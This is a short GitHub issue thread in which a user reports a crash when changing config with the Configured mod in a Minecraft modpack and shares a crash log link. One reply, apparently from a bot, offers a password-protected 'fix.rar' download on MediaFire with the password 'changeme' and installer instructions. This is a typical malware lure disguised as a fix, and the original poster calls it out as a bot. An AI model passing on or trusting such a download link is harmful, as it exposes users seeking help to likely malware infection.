### ISSUE TITLE
Crash trying change config in Slice of Life: Carrot edition

### ISSUE THREAD

**Issue by Karenpresci** [MrCrayfish/Configured#152]
I saw some peoples talking about they geting crash too, so here is my crash detail:

https://mclo.gs/AHCdEeO

Also. as i can change some of my mods configs, and didnt hapened before, this could be a diferent issue, as the mod shows work regulary.
So im also reporting the crash log because i hope this helps find the issue behind the crash :))

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Karenpresci** [comment]
That even bots here? OMG... im closing the comments.
